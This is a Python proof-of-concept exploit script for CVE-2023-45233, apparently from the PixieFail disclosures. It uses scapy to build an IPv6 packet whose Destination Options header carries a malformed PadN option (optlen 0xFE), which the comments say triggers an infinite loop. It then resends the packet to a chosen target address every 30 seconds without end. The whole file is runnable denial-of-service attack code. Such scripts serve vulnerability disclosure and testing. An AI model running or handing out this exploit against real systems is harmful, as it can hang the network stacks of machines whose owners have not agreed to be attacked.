pixiefail-CVE-2023-45233.py

import struct
import argparse
import time

from scapy.packet import Raw
from scapy.layers.inet import UDP
from scapy.layers.inet6 import *
from scapy.all import send, sniff

def send_packet_with_destination_option_header_bug_05(args):
    ip = IPv6(src=args.src, dst=args.target, nh=60)    # next header = IP6_DESTINATION
    # optlen 0xFE is the key to trigger the infinite loop
    # opdata is some junk, not relevant
    padn = PadN(optlen=0xFE, optdata=b'AAAABBBBDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD')
    # next header = IP6_NO_NEXT_HEADER
    dest_opt = IPv6ExtHdrDestOpt(nh=59, autopad=0, options=[padn])
    pkt = ip/dest_opt
    pkt.show2()

    send(pkt)


def main(args):
    while True:
        print('Sending packet with Destination Options header containing crafted PadN option and sleeping 30 seconds...')
        send_packet_with_destination_option_header_bug_05(args)
        time.sleep(30)



if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Proof of concept for CVE-2023-45233.")
    parser.add_argument('--src', type=str, required=False, help='Source IPv6 address to use')
    parser.add_argument('--target', type=str, required=True, help='Target IPv6 address')
    parser.add_argument('--interface', type=str, required=True, help='Name of the network interface to use')
    args = parser.parse_args()

    main(args)